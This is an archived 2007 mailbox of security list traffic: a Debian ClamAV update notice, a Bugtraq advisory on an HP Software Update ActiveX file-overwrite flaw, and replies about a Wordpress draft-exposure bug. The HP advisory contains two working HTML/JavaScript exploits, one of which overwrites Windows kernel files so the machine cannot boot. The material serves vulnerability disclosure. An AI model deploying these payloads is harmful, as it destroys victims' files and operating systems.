Size/MD5 checksum: 854742 57beb6f74e26662127429e1d78a824d7
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_mipsel.deb
Size/MD5 checksum: 180116 846c6c45d717ff883c9cc7e11cc82765
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_mipsel.deb
Size/MD5 checksum: 365774 d8a1ceb423b0d77b54951002976ac3d8
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_mipsel.deb
Size/MD5 checksum: 636366 b379e0789244a3bd9dd90b7e21e1c58b
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_mipsel.deb
Size/MD5 checksum: 9301788 497419c8c083968fc0d54e3121a1095f
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_mipsel.deb
Size/MD5 checksum: 176030 ac35e877599031d1895304b921d44ae2
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_mipsel.deb
Size/MD5 checksum: 427180 d682d96e183083ef4a571ec2f7c4298b
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 378618 ac31fa084fdaf402f87afb992d0e4919
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 637410 a814ede334af4f81d029ac4ac8c0fb83
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 405942 effc00cf153a20ed907eed3de9c76a8f
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 181936 e0d817c4c004ff2d180e5c87d5ec26b6
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 176484 dae82dca5708965c50779c18285039f8
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 857412 77892bc52041b4296a19c63f3538028f
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_powerpc.deb
Size/MD5 checksum: 9302416 db25b250486fc1e45b51c48c71ed8807
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 401940 00f65f05d9cdff66947f94ddb59a6d80
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 391738 5a298a20cd909782920da383ae77ddbd
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 628426 d77305723f25d00e28ec2523b4759da4
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 9301000 4a540d3fffade4b41a28be56e0a9d24f
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 855364 c1e3fc44c8ac430ad96c9a13f2ea8c58
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 177254 ca9f49f7d4836d4db368379bc120c0b6
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_s390.deb
Size/MD5 checksum: 176500 3d0b34e3944ad7b350d52be7cd70a8cd
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 377600 9cd5d18a4719d28d879ba501b45f0582
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 851500 03ec16f173cdb84ea5dbddc775d99788
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 174144 943695d2439ce05aaedaa219c172ca35
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 389560 c3f81ec42378fcd6071ceeec99c8ff65
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 172228 33bd227c0c8ea1c0fb7db99e1e8824bb
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 9298896 2168cb8008c1b7cb0bd593beb567a569
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_sparc.deb
Size/MD5 checksum: 584086 bded082a151f4bcc4a5be6d798b99cd7
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHaVa3Xm3vHE4uyloRAkIlAJ9YeMDZX5mvNpv2rAVgcePjaUpKRQCeP9CR
tNi2ydb9KfZ7Td8mFOWk9eY=BLYc
-----END PGP SIGNATURE-----
From - Wed Dec 19 16:10:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004dfd
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35033-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3F7155CC028
for <lists@securityspace.com>; Wed, 19 Dec 2007 16:09:39 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 13:05:47 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 674C52376E9; Wed, 19 Dec 2007 13:41:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15871 invoked from network); 19 Dec 2007 20:03:50 -0000
Date: 19 Dec 2007 20:39:51 -0000
Message-ID: <20071219203951.4560.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: porkythepig@anspi.pl
To: bugtraq@securityfocus.com
Subject: HP laptops Software Update tool vulnerability
Status:
Advisory:
/////////
There is another remotely exploitable flaw within software preinstalled in HP notebook machines. This time, the culprit is automatic software update tool provided by the vendor.The Potential exploitation may lead to user files loss or altering vital system files (e.g. kernel), thus leaving PC unbootable.
Overview:
/////////
The flaw is located in the software called HP Software Update shipped with the HP notebooks to support automatic software updates and critical vulnerability patching. One of the ActiveX controls deployed by default by the vendor contains an insecure method giving a potential attacker the remote system arbitrary file write access.
Impact:
///////
Remote user files contents corruption
Remote system kernel files damage / Operating System DoS condition
Attack vectors:
///////////////
There are two main attack vector schemes:
- inducing remote user to launch WWW link after obtaining the information about the location of an arbitrary file(s) locations/names in the remote system. After clicking the link the files contents will be unrecoverably destroyed. This attack vector thus requires additional social engineering of the vitim to acquire exact name and location of the potential attack target files.
- inducing remote user to launch WWW link resulting in corruption of vital Operating System files, leaving the system unusable. This attack vector DOESN'T require any additional victim social engineering,
because the system files are always placed in the predictable locations.
Technical details:
//////////////////
The vulnerable ActiveX control EngineRules.dll is a component of HP Software Updates system designed by the vendor.
It has assigned CLSID: 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by default included to "Safe for Scripting" OLE components, that allows full execution scripting access to the control methods from within the browser.
The default control installation path is
C:\Program Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll
The control is used by the the HP Software Updates software's HPWUCli.exe client application to enumerate, load and store available software patches information. The HPWUCli.exe binary is located in the directory:
C:\Program Files\HP\HP Software Update\
The control may also be used by a remote WWW service, such as Hewlett-Packard online software update service.
The potentialy insecure method is:
void SaveToFile(String dataFilePath);
This method is used to store the software patch specific data (version, remote location, vendor name, software description) in the binary file beginning with the 32bit integer value containing the actual patches count stored in the data file.
The problem lies in the lack of distinguish between local and global data file area in this control. Both LoadDataFromFile() method and SaveDataToFile() method have an access to the entire file system data area, therefore any arbitrary user file can be accessed remotely using one of these methods by a remote entity.
Use the SaveDataToFile() can be exploited to store the empty-by-initialize software patch data in the existing file, which will result in previous file contents loss and resetting it to 4 zero-bytes, describing a zero-size patch.
Noticing a specific vulnerability location (vendor's software update system), simple disabling of the vulnerable control by the vendor's patch (like in the other HP software vulnerbility case - HPInfo) would result in the machine software update system compromise in this case and would leave the user vulnerable to the future security issues.
Therefore reimplemetation of the update system and/or vulnerable control local data area implementation is strongly recommended.
Remote Kernel Wreckage Exploit
//////////////////////////////
Using this flaw one can construct an armed exploit, able for example to destroy remote system kernel files and make the remote machine UNBOOTABLE. The exploit is using vulnerable SaveToFile() to overwrite the NT System kernel files with the 4 zero bytes. The target are memory mapped ntoskrnl.exe and ntkrnlpa.exe kernel files which don't have a write lock set on them and may be opened for write. Although Windows NT system contains a protection for this kind of activity (system files overwrite) it can be fooled by overwriting simultanously: system binary files backup directory (\System32\DllCache\) actual system kernel files (\System32\) and the Driver Backup directory (\Windows\Driver Cache\)
kernel files.
After the execution it will store an zero-initialized patch information using SaveToFile() method sequentially to ntoskrnl.exe, ntkrnlpa.exe, ntkrnlmp.exe ,ntkrpamp.exe NT kernel files , first in the System32\DllCache\ directory, second to \System32\ directory and finally to Windows\Driver Cache\ dir. After the very next OS shutdown, machine will not be bootable anymore.
The exploit code has been attached to the end of this advisory. NOTE however that it is provided ONLY as a Proof of Concept code and has been released ONLY to estimate the impact level of the issue.
Vulnerable Software:
////////////////////
HP Software Update client v3.0.8.4
RulesEngine.dll ActiveX CTL v1.0
Internet Explorer 6.0
Internet Explorer 7.0
Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista
Vulnerable Hardware
///////////////////
Every HP notebook machine containing the HP Software Updates application is vulnerable. It is possible that the vulnerable machine model list disclosed by the vendor as a confirmation to the previous issue concerning HP laptops - "HP Info Center" case, will be similar in this case.
Exploits:
/////////
//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////
<html>
<head>
<script language="JavaScript">
var filePath="c:\\temp\\testfile.txt";
function spawn3()
{
o2obj.SaveToFile(filePath);
}
</script>
</head>
<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>
////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//
// WARNING! THE REAL THING...
// DON'T TRY THIS AT HOME!
// THIS WILL DAMAGE YOUR
// HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////
<html>
<head>
<script language="JavaScript">
function spawn3()
{
o2obj.EvaluateRules();
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab");
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab");
}
function meltdown()
{
spawn3();
spawn3();
spawn3();
}
</script>
</head>
<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>
Related final word:
///////////////////
Spiderpig, spiderpig, does whatever the spiderpig does...
;-)
Links:
//////
Original advisory link:
www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt
Credits:
////////
Issue discovery and research: porkythepig
Contact: porkythepig@anspi.pl
From - Wed Dec 19 16:40:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004dfe
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35032-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 3720D5CC01F
for <lists@securityspace.com>; Wed, 19 Dec 2007 16:40:31 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 13:23:52 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 23935143833; Wed, 19 Dec 2007 12:37:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15489 invoked from network); 19 Dec 2007 19:39:30 -0000
Date: 19 Dec 2007 20:07:40 -0000
Message-ID: <20071219200740.14434.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: otto@ottodestruct.com
To: bugtraq@securityfocus.com
Subject: Re: Wordpress - Broken Access Control
Status:
Nobody was attacking you. Calm down and try to be a bit more professional, please.
Although I am still unable to reproduce the problem on any sort of setup, a few other people have claimed to make it work as well. So a patch has been created and applied to eliminate the dependancy on "wp-admin/". The patch will most likely be in the next version of WordPress.
The bug tracking and patch for this issue can be found here:
http://trac.wordpress.org/ticket/5487
From - Wed Dec 19 16:50:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004dff
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35034-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8EC835CC01F
for <lists@securityspace.com>; Wed, 19 Dec 2007 16:42:14 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 13:25:35 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 965DD237015; Wed, 19 Dec 2007 14:07:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19062 invoked from network); 19 Dec 2007 20:41:31 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:received:received:date:from:to:subject:message-id:references:mime-version:content-type:content-disposition:in-reply-to;
bh=hmC8ro/A5qzo9W8flfRnD4lwzPsPVM3e2tBxuFa+Qfk=;
b=FWwAg8Pq/cePeOP1SvmZPHlodLAfnw49oaiinF2LhdqjlgK/sK1Cyp7B5v1CO+dnwFiwQGLNjDwXw9zAkJLgmP8Q24tg8pu0o0dl1ANXOhuyTID0E5OuFeI9rvFnFlqnglJnlFjW55Bsa1JvbsbqusUtOqFEE+TPSJPu61j+/cwDomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h�te:from:to:subject:message-id:references:mime-version:content-type:content-disposition:in-reply-to;
b=FUztV6RCl3leEgEnv9M792jFpEzu9hIg7q1I701WYJvqNJm9EgEOV6bQwfwtfQRC0tsQgg0mibKKDqniO1UgyEqZpkPz2pBd6LbX8JITfX3BLmL6GjQYa1TTMQ2Je7TbH6AkmzPR7QSsrfS86PCDu8R65GfbPCbNEtzU2GEOGTQDate: Thu, 20 Dec 2007 05:29:01 +0800
From: Abel Cheung <abelcheung@gmail.com>
To: bugtraq@securityfocus.com
Subject: Re: Wordpress - Broken Access Control
Message-ID: <20071219212901.GA5252@deaddog.org>
References: <20071216100729.31246.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="bg08WKrSYDhXBjb5"
Content-Disposition: inline
In-Reply-To: <20071216100729.31246.qmail@securityfocus.com>
Status:
--bg08WKrSYDhXBjb5
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On 2007-12-16(Sun) 10:07:29 -0000, otto@ottodestruct.com wrote:
> The is_admin() function is not supposed to tell whether a user is an administrator or not, it tells whether the user is looking at one of the administration pages. As such, this function does exactly what it is supposed to do.
>
> As for the rest, there is no flaw. To view a draft, the user must authenticate and have the correct capability set. There is no way to view drafts without being logged in and having that capability set on the user's role level.
>
> This "vulnerability" is non-existent.
Here I confirm the validity of the vulnerability:
Machine: Windows 2000 SP4, Apache 2.2.4, MySQL 5.0.45
Wordpress version tested: 2.2.0, 2.2.3, 2.3.1
Everytime the URL
http://localhost/wordpress/index.php/wp-admin/ is
used, and user is NOT logged in. In each wordpress version draft
posts are indeed shown.
And according to wordpress bug report, a patch is applied on
19th to address the problem.
Abel
--
Abel Cheung (GPG Key: 0xC67186FF)
Key fingerprint: 671C C7AE EFB5 110C D6D1 41EE 4152 E1F1 C671 86FF
--------------------------------------------------------------------
* My blog -
http://me.abelcheung.org/
* Opensource Application Knowledge Assoc. -
http://oaka.org/
